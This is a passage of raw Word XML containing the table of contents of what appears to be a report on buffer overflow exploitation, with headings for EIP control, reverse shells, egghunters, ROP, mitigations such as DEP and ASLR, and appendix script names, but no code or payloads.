      <w:hyperlink w:anchor="_Toc71564001" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="794C5A4D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564002" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564002" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564002" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Procedure</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564002" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01312853" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564003" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564003" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564003" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Preparation</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564003" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55E49E71" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564004" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Locating EIP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564004" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E9F27EC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564005" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Determining Available Space</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564005" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7ACB69FD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564006" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Character Filtering</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564006" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>8</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68AE0645" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564007" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564007" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564007" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Proof of Concept</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564007" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77336C8A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564008" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3.3</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564008" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564008" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Reverse Shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564008" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>10</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AD7E46B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564009" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564009" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564009" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>EggHunter</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564009" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>12</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1762A122" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564010" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>3.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564010" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564010" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>ROP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564010" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>13</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DCC5B09" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="440"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564011" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564011" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564011" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Discussion</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564011" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>16</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="63CD3F42" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="1100"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564012" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>4.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564012" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564012" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Countermeasures and Evasion</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564012" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>16</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5400C2C2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564013" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>DEP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564013" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>16</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C3C6903" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564014" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>ASLR</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564014" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>17</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74957E70" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564015" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>SEHOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564015" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>17</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2620938A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564016" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Canaries</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564016" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>17</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AC8CA8E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564017" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>References</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564017" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>18</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="140F96FC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564018" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Appendices</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564018" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="351FFC84" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564019" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Appendix A – Code Files</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564019" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27272BEC" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564020" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Courier New"/>
          </w:rPr>
          <w:t>Crash.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564020" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24CCB9A7" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564021" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Courier New"/>
          </w:rPr>
          <w:t>Pattern.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564021" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>19</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CFB08FE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564022" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Courier New"/>
          </w:rPr>
          <w:t>Crashspace.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564022" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>20</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2594E37F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564023" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Courier New"/>
          </w:rPr>
          <w:t>Filtertest.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564023" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>20</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BE85634" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564024" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Payload.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564024" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>20</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B3FE546" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564025" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>ReverseShell.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564025" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>21</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D4BAD35" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564026" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Egghunter.pl</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564026" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>22</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B40B0FB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564027" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Ropchain.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564027" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>23</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BD26826" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564028" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Appendix B - .ini Files</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564028" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>25</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11F240EA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564029" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:rFonts w:eastAsia="Courier New"/>
          </w:rPr>
          <w:t>Crash.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564029" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>25</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15B112F3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564030" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Crashpattern.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564030" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>26</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4530A1C2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564031" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Filtertest.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564031" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75BA7321" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564032" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Payload.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564032" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CDFA929" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564033" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Reverseshell.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564033" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>27</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B693A38" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564034" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Egghunter.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564034" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>28</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EEB7C9E" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9790"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564035" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:t>Ropchain.ini</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564035" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>28</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B18800D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00C77908">
      <w:pPr>
        <w:pStyle w:val="Contents2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9570"/>
        </w:tabs>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc71564036" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:rPr>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>Appendix C</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564036" w:history="1">
        <w:r w:rsidR="00AD2FFF">
          <w:tab/>
          <w:t>30</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75F57DF0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9360"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65ED4CE8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc71564037" w:history="1">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure 1- Buffer Overflow Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_Toc71564037" w:history="1">
        <w:r>
          <w:rPr>
            <w:sz w:val="20"/>
